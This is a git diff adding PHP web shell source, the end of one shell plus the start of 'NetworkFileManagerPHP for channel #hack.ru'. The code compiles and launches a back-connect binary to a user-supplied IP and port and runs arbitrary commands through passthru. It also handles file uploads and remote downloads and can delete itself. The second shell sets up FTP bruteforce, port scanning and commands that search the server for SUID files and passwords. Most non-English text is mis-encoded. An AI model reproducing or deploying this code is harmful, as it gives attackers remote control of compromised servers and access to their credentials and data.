$w_file=fopen("/tmp/back.c","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($back_connect_c)); + fclose($w_file); + $blah=exec("gcc -o /tmp/backc /tmp/back.c"); + unlink("/tmp/back.c"); + $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"; + $blah=exec($bc_string); + $_POST['cmd']="echo \"رهé÷àٌ ٌêًèïٍ êîييهêٍèٌٍے ?".$_POST['ip']." port ".$_POST['port']." ...\""; + $err=0; + } +} +echo "<font face=Verdana size=-2>آûïîëيهييàے êîىàين? <b>".$_POST['cmd']."</b></font></td></tr><tr><td>"; +echo "<b>"; +echo "<br>ذهçَëüٍà? 
"; +echo "<font color=red size=2"; +print "".passthru($_POST['cmd']).""; +echo "</font></b>"; +break; + +// Uploading +case "upload": + +echo <<<HTML +<b>اàمًَçêà ôàéëîâ</b> +<a href='$php_self?ac=massupload&d=$d&t=massupload'>* اàمًَçèٍ?لîëüّî?êîëè÷هٌٍâî ôàéëîâ *</a><br><br> +<table> +<form enctype="multipart/form-data" action="$self" method="POST"> +<input type="hidden" name="ac" value="upload"> +<tr> +<td>شàéë:</td> +<td><input size="48" name="file" type="file"></td> +</tr> +<tr> +<td>دàïê?</td> +<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="دîٌëàٍ?></td><br> +$tend +HTML; + +if (isset($_POST['path'])){ + +$uploadfile = $_POST['path'].$_FILES['file']['name']; +if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} + +if (copy($_FILES['file']['tmp_name'], $uploadfile)) { + echo "شàéë ٌَïهّي?çàمًَوهي ?ïàïê?$uploadfile\n"; + echo "بىے:" .$_FILES['file']['name']. "\n"; + echo "ذàçىهً:" .$_FILES['file']['size']. "\n"; + +} else { + print "حه َنà¸ٌٍے çàمًَçèٍ?ôàéë. بيôà:\n"; + print_r($_FILES); +} +} + + +echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post> +<b>اàمًَçêà ôàéëîâ ?َنàëهييîمî êîىïü‏ٍهًà:</b><br> + HTTP ïٍَü ?ôàéë? <br> +<input type='text' name='file3' value='http://' size=40><br> +حàçâàيèه ôàéë?èë?ïٍَü ?يàçâàيèه?ôàéë? <br> +<input type='text' name='file2' value='$docr/' size=40><br> +<input type='submit' value='اàمًَçèٍ?ôàéë'></form>"; + + +if (!isset($status)) downfiles(); + +else +{ + +$data = @implode("", file($file3)); +$fp = @fopen($file2, "wb"); +@fputs($fp, $data); +$ok = @fclose($fp); +if($ok) +{ +$size = filesize($file2)/1024; +$sizef = sprintf("%.2f", $size); + +print "<br><center>آû çàمًَçèë? 
<b>ôàéë <u>$file2</u> ًàçىهًîى</b> (".$sizef."êء) </center>"; +} +else +{ +print "<br><center><font color=red size = 2><b>خّèلêà çàمًَçêè ôàéë?/b></font></center>"; +} +} + + + +break; +// Tools +case "tools": +echo "<form method=post>أهيهًàِèے md5 ّèôً?br><input name=md5 size=30></form><br>"; +@$md5=@$_POST['md5']; +if(@$_POST['md5']){ echo "md5 ٌمهيهًèًîâàي:<br> ".md5($md5)."";} +echo "<br> +<form method=post>تîنèًîâàيè?نهêîنèًîâàيè?base64<br><input name=base64 size=30></form><br>"; +if(@$_POST['base64']){ +@$base64=$_POST['base64']; +echo " +تîنèًîâàيî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br> +ؤهêîنèًîâàيî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";} +echo "<br> +<form method=post>DES êîنèًîâàيè?<br><input name=des size=30></form><br>"; +if(@$_POST['des']){ +@$des=@$_POST['des']; +echo "Des ٌمهيهًèًîâàي: <br>".crypt($des)."";} +echo "<br> +<form method=post>SHA1 êîنèًîâàيè?<br><input name=sha1 size=30></form><br>"; +if(@$_POST['sha1']){ +@$des=@$_POST['sha1']; +echo "SHA1 ٌمهيهًèًîâàي: <br>".sha1($sha1a)."";} + +echo "<form method=POST>"; +echo "html-êî?-> ّهٌٍيàنِàٍèًè÷يû?çيà÷هي?<br><input type=text name=data size=30>"; + + +if (isset($_POST['data'])) +{ +echo "<br><br><b>ذهçَëüٍà?<br></b>"; +$str=str_replace("%20","",$_POST['data']); +for($i=0;$i<strlen($str);$i++) +{ +$hex=dechex(ord($str[$i])); +if ($str[$i]=='&') echo "$str[$i]"; +else if ($str[$i]!='\\') echo "%$hex"; +} +} +exit; +break; +// Mass Uploading +case "massupload": + + +echo " +جàٌîâàے çàمًَçêà ôàéëîâ:<br> +<form enctype=\"multipart/form-data\" method=post> +<input type=file name=text1 size=43> <input type=file name=text11 size=43><br> +<input type=file name=text2 size=43> <input type=file name=text12 size=43><br> +<input type=file name=text3 size=43> <input type=file name=text13 size=43><br> +<input type=file name=text4 size=43> <input type=file name=text14 size=43><br> +<input type=file name=text5 size=43> <input type=file 
name=text15 size=43><br> +<input type=file name=text6 size=43> <input type=file name=text16 size=43><br> +<input type=file name=text7 size=43> <input type=file name=text17 size=43><br> +<input type=file name=text8 size=43> <input type=file name=text18 size=43><br> +<input type=file name=text9 size=43> <input type=file name=text19 size=43><br> +<input type=file name=text10 size=43> <input type=file name=text20 size=43><br> +<input name=where size=43 value='$docr'><br> +<input type=submit value=اàمًَçèٍ?name=massupload> +</form><br>"; + +if(@$_POST['massupload']){ +$where=@$_POST['where']; +$uploadfile1 = "$where/".@$_FILES['text1']['name']; +$uploadfile2 = "$where/".@$_FILES['text2']['name']; +$uploadfile3 = "$where/".@$_FILES['text3']['name']; +$uploadfile4 = "$where/".@$_FILES['text4']['name']; +$uploadfile5 = "$where/".@$_FILES['text5']['name']; +$uploadfile6 = "$where/".@$_FILES['text6']['name']; +$uploadfile7 = "$where/".@$_FILES['text7']['name']; +$uploadfile8 = "$where/".@$_FILES['text8']['name']; +$uploadfile9 = "$where/".@$_FILES['text9']['name']; +$uploadfile10 = "$where/".@$_FILES['text10']['name']; +$uploadfile11 = "$where/".@$_FILES['text11']['name']; +$uploadfile12 = "$where/".@$_FILES['text12']['name']; +$uploadfile13 = "$where/".@$_FILES['text13']['name']; +$uploadfile14 = "$where/".@$_FILES['text14']['name']; +$uploadfile15 = "$where/".@$_FILES['text15']['name']; +$uploadfile16 = "$where/".@$_FILES['text16']['name']; +$uploadfile17 = "$where/".@$_FILES['text17']['name']; +$uploadfile18 = "$where/".@$_FILES['text18']['name']; +$uploadfile19 = "$where/".@$_FILES['text19']['name']; +$uploadfile20 = "$where/".@$_FILES['text20']['name']; +if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile1</i><br>";} +if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? 
$uploadfile2</i><br>";} +if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile3</i><br>";} +if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile4</i><br>";} +if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile5</i><br>";} +if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile6</i><br>";} +if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile7</i><br>";} +if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile8</i><br>";} +if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile9</i><br>";} +if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile10</i><br>";} +if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile11</i><br>";} +if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile12</i><br>";} +if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile13</i><br>";} +if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? 
$uploadfile14</i><br>";} +if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile15</i><br>";} +if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile16</i><br>";} +if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile17</i><br>";} +if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile18</i><br>";} +if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile19</i><br>";} +if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile20</i><br>";} +} + +exit; +break; +case "selfremover": + print "<tr><td>"; +print "<font color=red face=verdana size=1>زû َâهًهي, ÷ٍ?ُî÷ه?َنàëèٍ?‎ٍîٍ ّهëë ?ٌهًâهً??<br> +<a href='$php_self?p=yes'>ؤà, ُî÷َ</a> | <a href='$php_self?'>حه? ïٌٍَ?هù?ïîلَنه?/a><br> +ءَنه?َنàëےٍü: <u>"; +$path=__FILE__; +print $path; +print " </u>?</td></tr></table>"; +die; +} + +if($p=="yes"){ +$path=__FILE__; +@unlink($path); +$path=str_replace("\\","/",$path); +if(file_exists($path)){$hmm="شàéë يهâîçىîويî َنàëèٍ?!!"; +print "<tr><td><font color=red>شàéë $path يه َنàëهي !</td></tr>"; +}else{$hmm="سنàëهي";} +print "<script>alert('$path $hmm');</script>"; + +} +break; + + +?> + + + 
diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg
new file mode 100644
index 0000000..18657e7
Binary files /dev/null and b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg differ
diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/Thumbs.db b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/Thumbs.db
new file mode 100644
index 0000000..8f2476c
Binary files /dev/null and b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/Thumbs.db differ
diff --git a/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg
new file mode 100644
index 0000000..b482ff4
Binary files /dev/null and b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg differ
diff --git a/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php
@@ -0,0 +1,5603 @@ +<? + +if (ini_get('register_globals') != '1') { + + if (!empty($HTTP_POST_VARS)) + + extract($HTTP_POST_VARS); + + + + if (!empty($HTTP_GET_VARS)) + + extract($HTTP_GET_VARS); + + if (!empty($HTTP_SERVER_VARS)) + + extract($HTTP_SERVER_VARS); + +} + + + +$use_md5=0; // Define use of MD5 crypt algoritm // + +$uname="1"; + +$upass="1"; + + + + + + +if ($action != "download" && $action != "view" ): + +?> + + + +<? + + + +/* Define your email for file send function*/ + +$demail ="effes2004@gmail.com"; + + + +/* config here */ + +$title="NetworkFileManagerPHP for channel #hack.ru"; + +$ver="1.7.private ([final_english_release])"; + +$sob="Belongs to <b><u>revers</u></b>"; + +$id="1337"; + + + +/* FTP-bruteforce */ + +$filename="/etc/passwd"; + +$ftp_server="localhost"; + +/* port scanner */ + +$min="1"; + +$max="65535"; + + + +/* Aliases */ + +$aliases=array( + +/* find all SUID files */ + +'find / -type f -perm -04000 -ls' => 'find all suid files' , + +/* find all SGID files */ + +'find / -type f -perm -02000 -ls' => 'find all sgid files', + +/* find all config.inc.php files */ + +'find / -type f -name config.inc.php' => 'find all config.inc.php files', + +/* find accesseable writeable directories and files*/ + +'find / -perm -2 -ls' => 'find writeable directories and files', + +'ls -la' => 'Current directory listing with rights access', + +'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password' + + + +); + + + +/* ports and services names */ + +$port[1] = "tcpmux (TCP Port Service Multiplexer)"; + +$port[2] = "Management Utility"; + +$port[3] = "Compression Process"; + +$port[5] = "rje (Remote Job Entry)"; + +$port[7] = "echo"; + +$port[9] = "discard"; + +$port[11] = "systat"; + +$port[13] = "daytime"; + +$port[15] = "netstat"; + +$port[17] = "quote of the day"; + +$port[18] = "send/rwp"; + +$port[19] = "character generator"; + +$port[20] = "ftp-data"; + +$port[21] = "ftp"; + +$port[22] = "ssh, pcAnywhere"; + 
+$port[23] = "Telnet"; + +$port[25] = "SMTP (Simple Mail Transfer)"; + +$port[27] = "ETRN (NSW User System FE)"; + +$port[29] = "MSG ICP"; + +$port[31] = "MSG Authentication"; + +$port[33] = "dsp (Display Support Protocol)"; + +$port[37] = "time"; + +$port[38] = "RAP (Route Access Protocol)"; + +$port[39] = "rlp (Resource Location Protocol)"; + +$port[41] = "Graphics"; + +$port[42] = "nameserv, WINS"; + +$port[43] = "whois, nickname"; + +$port[44] = "MPM FLAGS Protocol"; + +$port[45] = "Message Processing Module [recv]"; + +$port[46] = "MPM [default send]"; + +$port[47] = "NI FTP"; + +$port[48] = "Digital Audit Daemon"; + +$port[49] = "TACACS, Login Host Protocol"; + +$port[50] = "RMCP, re-mail-ck"; + +$port[53] = "DNS"; + +$port[57] = "MTP (any private terminal access)"; + +$port[59] = "NFILE"; + +$port[60] = "Unassigned"; + +$port[61] = "NI MAIL"; + +$port[62] = "ACA Services"; + +$port[63] = "whois++"; + +$port[64] = "Communications Integrator (CI)"; + +$port[65] = "TACACS-Database Service"; + +$port[66] = "Oracle SQL*NET"; + +$port[67] = "bootps (Bootstrap Protocol Server)"; + +$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; + +$port[69] = "Trivial File Transfer Protocol (tftp)"; + +$port[70] = "Gopher"; + +$port[71] = "Remote Job Service"; + +$port[72] = "Remote Job Service"; + +$port[73] = "Remote Job Service"; + +$port[74] = "Remote Job Service"; + +$port[75] = "any private dial out service"; + +$port[76] = "Distributed External Object Store"; + +$port[77] = "any private RJE service"; + +$port[78] = "vettcp"; + +$port[79] = "finger"; + +$port[80] = "World Wide Web HTTP"; + +$port[81] = "HOSTS2 Name Serve"; + +$port[82] = "XFER Utility"; + +$port[83] = "MIT ML Device"; + +$port[84] = "Common Trace Facility"; + +$port[85] = "MIT ML Device"; + +$port[86] = "Micro Focus Cobol"; + +$port[87] = "any private terminal link"; + +$port[88] = "Kerberos, WWW"; + +$port[89] = "SU/MIT Telnet Gateway"; + +$port[90] = "DNSIX Securit Attribute Token Map"; + +$port[91] 
= "MIT Dover Spooler"; + +$port[92] = "Network Printing Protocol"; + +$port[93] = "Device Control Protocol"; + +$port[94] = "Tivoli Object Dispatcher"; + +$port[95] = "supdup"; + +$port[96] = "DIXIE"; + +$port[98] = "linuxconf"; + +$port[99] = "Metagram Relay"; + +$port[100] = "[unauthorized use]"; + +$port[101] = "HOSTNAME"; + +$port[102] = "ISO, X.400, ITOT"; + +$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et"; + +$port[104] = "ACR-NEMA Digital Imag. & Comm. 300"; + +$port[105] = "CCSO name server protocol"; + +$port[106] = "poppassd"; + +$port[107] = "Remote Telnet Service"; + +$port[108] = "SNA Gateway Access Server"; + +$port[109] = "POP2"; + +$port[110] = "POP3"; + +$port[111] = "Sun RPC Portmapper"; + +$port[112] = "McIDAS Data Transmission Protocol"; + +$port[113] = "Authentication Service"; + +$port[115] = "sftp (Simple File Transfer Protocol)"; + +$port[116] = "ANSA REX Notify"; + +$port[117] = "UUCP Path Service"; + +$port[118] = "SQL Services"; + +$port[119] = "NNTP"; + +$port[120] = "CFDP"; + +$port[123] = "NTP"; + +$port[124] = "SecureID"; + +$port[129] = "PWDGEN"; + +$port[133] = "statsrv"; + +$port[135] = "loc-srv/epmap"; + +$port[137] = "netbios-ns"; + +$port[138] = "netbios-dgm (UDP)"; + +$port[139] = "NetBIOS"; + +$port[143] = "IMAP"; + +$port[144] = "NewS"; + +$port[150] = "SQL-NET"; + +$port[152] = "BFTP"; + +$port[153] = "SGMP"; + +$port[156] = "SQL Service"; + +$port[161] = "SNMP"; + +$port[175] = "vmnet"; + +$port[177] = "XDMCP"; + +$port[178] = "NextStep Window Server"; + +$port[179] = "BGP"; + +$port[180] = "SLmail admin"; + +$port[199] = "smux"; + +$port[210] = "Z39.50"; + +$port[213] = "IPX"; + +$port[218] = "MPP"; + +$port[220] = "IMAP3"; + +$port[256] = "RAP"; + +$port[257] = "Secure Electronic Transaction"; + +$port[258] = "Yak Winsock Personal Chat"; + +$port[259] = "ESRO"; + +$port[264] = "FW1_topo"; + +$port[311] = "Apple WebAdmin"; + +$port[350] = "MATIP type A"; + +$port[351] = "MATIP type B"; 
+ +$port[363] = "RSVP tunnel"; + +$port[366] = "ODMR (On-Demand Mail Relay)"; + +$port[371] = "Clearcase"; + +$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; + +$port[389] = "LDAP"; + +$port[407] = "Timbuktu"; + +$port[427] = "Server Location"; + +$port[434] = "Mobile IP"; + +$port[443] = "ssl"; + +$port[444] = "snpp, Simple Network Paging Protocol"; + +$port[445] = "SMB"; + +$port[458] = "QuickTime TV/Conferencing"; + +$port[468] = "Photuris"; + +$port[475] = "tcpnethaspsrv"; + +$port[500] = "ISAKMP, pluto"; + +$port[511] = "mynet-as"; + +$port[512] = "biff, rexec"; + +$port[513] = "who, rlogin"; + +$port[514] = "syslog, rsh"; + +$port[515] = "lp, lpr, line printer"; + +$port[517] = "talk"; + +$port[520] = "RIP (Routing Information Protocol)"; + +$port[521] = "RIPng"; + +$port[522] = "ULS"; + +$port[531] = "IRC"; + +$port[543] = "KLogin, AppleShare over IP"; + +$port[545] = "QuickTime"; + +$port[548] = "AFP"; + +$port[554] = "Real Time Streaming Protocol"; + +$port[555] = "phAse Zero"; + +$port[563] = "NNTP over SSL"; + +$port[575] = "VEMMI"; + +$port[581] = "Bundle Discovery Protocol"; + +$port[593] = "MS-RPC"; + +$port[608] = "SIFT/UFT"; + +$port[626] = "Apple ASIA"; + +$port[631] = "IPP (Internet Printing Protocol)"; + +$port[635] = "RLZ DBase"; + +$port[636] = "sldap"; + +$port[642] = "EMSD"; + +$port[648] = "RRP (NSI Registry Registrar Protocol)"; + +$port[655] = "tinc"; + +$port[660] = "Apple MacOS Server Admin"; + +$port[666] = "Doom"; + +$port[674] = "ACAP"; + +$port[687] = "AppleShare IP Registry"; + +$port[700] = "buddyphone"; + +$port[705] = "AgentX for SNMP"; + +$port[901] = "swat, realsecure"; + +$port[993] = "s-imap"; + +$port[995] = "s-pop"; + +$port[1024] = "Reserved"; + +$port[1025] = "network blackjack"; + +$port[1062] = "Veracity"; + +$port[1080] = "SOCKS"; + +$port[1085] = "WebObjects"; + +$port[1227] = "DNS2Go"; + +$port[1243] = "SubSeven"; + +$port[1338] = "Millennium Worm"; + +$port[1352] = "Lotus Notes"; + +$port[1381] = 
"Apple Network License Manager"; + +$port[1417] = "Timbuktu Service 1 Port"; + +$port[1418] = "Timbuktu Service 2 Port"; + +$port[1419] = "Timbuktu Service 3 Port"; + +$port[1420] = "Timbuktu Service 4 Port"; + +$port[1433] = "Microsoft SQL Server"; + +$port[1434] = "Microsoft SQL Monitor"; + +$port[1477] = "ms-sna-server"; + +$port[1478] = "ms-sna-base"; + +$port[1490] = "insitu-conf"; + +$port[1494] = "Citrix ICA Protocol"; + +$port[1498] = "Watcom-SQL"; + +$port[1500] = "VLSI License Manager"; + +$port[1503] = "T.120"; + +$port[1521] = "Oracle SQL"; + +$port[1522] = "Ricardo North America License Manager"; + +$port[1524] = "ingres"; + +$port[1525] = "prospero"; + +$port[1526] = "prospero"; + +$port[1527] = "tlisrv"; + +$port[1529] = "oracle"; + +$port[1547] = "laplink"; + +$port[1604] = "Citrix ICA, MS Terminal Server"; + +$port[1645] = "RADIUS Authentication"; + +$port[1646] = "RADIUS Accounting"; + +$port[1680] = "Carbon Copy"; + +$port[1701] = "L2TP/LSF"; + +$port[1717] = "Convoy"; + +$port[1720] = "H.323/Q.931"; + +$port[1723] = "PPTP control port"; + +$port[1731] = "MSICCP"; + +$port[1755] = "Windows Media .asf"; + +$port[1758] = "TFTP multicast"; + +$port[1761] = "cft-0"; + +$port[1762] = "cft-1"; + +$port[1763] = "cft-2"; + +$port[1764] = "cft-3"; + +$port[1765] = "cft-4"; + +$port[1766] = "cft-5"; + +$port[1767] = "cft-6"; + +$port[1808] = "Oracle-VP2"; + +$port[1812] = "RADIUS server"; + +$port[1813] = "RADIUS accounting"; + +$port[1818] = "ETFTP"; + +$port[1973] = "DLSw DCAP/DRAP"; + +$port[1985] = "HSRP"; + +$port[1999] = "Cisco AUTH"; + +$port[2001] = "glimpse"; + +$port[2049] = "NFS"; + +$port[2064] = "distributed.net"; + +$port[2065] = "DLSw"; + +$port[2066] = "DLSw"; + +$port[2106] = "MZAP"; + +$port[2140] = "DeepThroat"; + +$port[2301] = "Compaq Insight Management Web Agents"; + +$port[2327] = "Netscape Conference"; + +$port[2336] = "Apple UG Control"; + +$port[2427] = "MGCP gateway"; + +$port[2504] = "WLBS"; + +$port[2535] = "MADCAP"; + 
+$port[2543] = "sip"; + +$port[2592] = "netrek"; + +$port[2727] = "MGCP call agent"; + +$port[2628] = "DICT"; + +$port[2998] = "ISS Real Secure Console Service Port"; + +$port[3000] = "Firstclass"; + +$port[3001] = "Redwood Broker"; + +$port[3031] = "Apple AgentVU"; + +$port[3128] = "squid"; + +$port[3130] = "ICP"; + +$port[3150] = "DeepThroat"; + +$port[3264] = "ccmail"; + +$port[3283] = "Apple NetAssitant"; + +$port[3288] = "COPS"; + +$port[3305] = "ODETTE"; + +$port[3306] = "mySQL"; + +$port[3389] = "RDP Protocol (Terminal Server)"; + +$port[3521] = "netrek"; + +$port[4000] = "icq, command-n-conquer and shell nfm"; + +$port[4321] = "rwhois"; + +$port[4333] = "mSQL"; + +$port[4444] = "KRB524"; + +$port[4827] = "HTCP"; + +$port[5002] = "radio free ethernet"; + +$port[5004] = "RTP"; + +$port[5005] = "RTP"; + +$port[5010] = "Yahoo! Messenger"; + +$port[5050] = "multimedia conference control tool"; + +$port[5060] = "SIP"; + +$port[5150] = "Ascend Tunnel Management Protocol"; + +$port[5190] = "AIM"; + +$port[5500] = "securid"; + +$port[5501] = "securidprop"; + +$port[5423] = "Apple VirtualUser"; + +$port[5555] = "Personal Agent"; + +$port[5631] = "PCAnywhere data"; + +$port[5632] = "PCAnywhere"; + +$port[5678] = "Remote Replication Agent Connection"; + +$port[5800] = "VNC"; + +$port[5801] = "VNC"; + +$port[5900] = "VNC"; + +$port[5901] = "VNC"; + +$port[6000] = "X Windows"; + +$port[6112] = "BattleNet"; + +$port[6502] = "Netscape Conference"; + +$port[6667] = "IRC"; + +$port[6670] = "VocalTec Internet Phone, DeepThroat"; + +$port[6699] = "napster"; + +$port[6776] = "Sub7"; + +$port[6970] = "RTP"; + +$port[7007] = "MSBD, Windows Media encoder"; + +$port[7070] = "RealServer/QuickTime"; + +$port[7777] = "cbt"; + +$port[7778] = "Unreal"; + +$port[7648] = "CU-SeeMe"; + +$port[7649] = "CU-SeeMe"; + +$port[8000] = "iRDMI/Shoutcast Server"; + +$port[8010] = "WinGate 2.1"; + +$port[8080] = "HTTP"; + +$port[8181] = "HTTP"; + +$port[8383] = "IMail WWW"; + +$port[8875] = 
"napster"; + +$port[8888] = "napster"; + +$port[8889] = "Desktop Data TCP 1"; + +$port[8890] = "Desktop Data TCP 2"; + +$port[8891] = "Desktop Data TCP 3: NESS application"; + +$port[8892] = "Desktop Data TCP 4: FARM product"; + +$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; + +$port[8894] = "Desktop Data TCP 6: COAL application"; + +$port[9000] = "CSlistener"; + +$port[10008] = "cheese worm"; + +$port[11371] = "PGP 5 Keyserver"; + +$port[13223] = "PowWow"; + +$port[13224] = "PowWow"; + +$port[14237] = "Palm"; + +$port[14238] = "Palm"; + +$port[18888] = "LiquidAudio"; + +$port[21157] = "Activision"; + +$port[22555] = "Vocaltec Web Conference"; + +$port[23213] = "PowWow"; + +$port[23214] = "PowWow"; + +$port[23456] = "EvilFTP"; + +$port[26000] = "Quake"; + +$port[27001] = "QuakeWorld"; + +$port[27010] = "Half-Life"; + +$port[27015] = "Half-Life"; + +$port[27960] = "QuakeIII"; + +$port[30029] = "AOL Admin"; + +$port[31337] = "Back Orifice"; + +$port[32777] = "rpc.walld"; + +$port[45000] = "Cisco NetRanger postofficed"; + +$port[32773] = "rpc bserverd"; + +$port[32776] = "rpc.spray"; + +$port[32779] = "rpc.cmsd"; + +$port[38036] = "timestep"; + +$port[40193] = "Novell"; + +$port[41524] = "arcserve discovery"; + + + +/* finished config, here goes the design */ + +$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">"; + +$style=<<<style + +<style> + +a. 
{ + +color: #ffffcc; + +text-decoration:none; + +font-family: Times New Roman; + +font-weight: bold; + + } + +a.menu:hover { + +color: #FF0000; + +font-family: Times New Roman; + +text-decoration: none + +font-weight: bold; + + } + +a { + +color: #000000; + +text-decoration:none; + +font-family: Tahoma; + +font-size: 11px; + + } + +a:hover { + +color: #184984; + +font-family: Tahoma; + +text-decoration: underline + +font-size: 11px; + + } + +td.up{ + +color: #996600; + +font-family: Verdana; + +font-weight: normal; + +font-size: 11px; + +} + +.pagetitle { + +font-family: Arial, Helvetica, sans-serif; + +color: #FFFFFF; + +text-decoration: none; + +font-size: 12px + +} + +.alert { + +color: #FF0000; + +font-family: Tahoma; + +font-size: 11px; + + } + +.button1 { + +font-size:11px; + +font-weight:bold; + +font-family:Verdana; + +background:#184984; + +border:1px solid #000000; cursor:hand; color:#ffffcc; + +} + +.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal} + +.submit_button { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;} + +.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid} + +b { font-weight: bold} + +table { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984} + +</style> + +style; + + + +/* table styles */ + +$style1=<<<table + +STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" + +table; + +$style2=<<<table_file + +STYLE="background:#184984" 
onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" + +table_file; + +$style3=<<<table_dir + +STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'" + +table_dir; + +$style4=<<<table_files + +STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'" + +table_files; + +$style_button=<<<button + +STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" + +button; + +$style_open=<<<open + +STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'" + +open; + +$style_close=<<<close + +STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'" + +close; + +$ins=<<<ins + +<script> + +function ins(text){ + +document.hackru.chars_de.value+=text; + 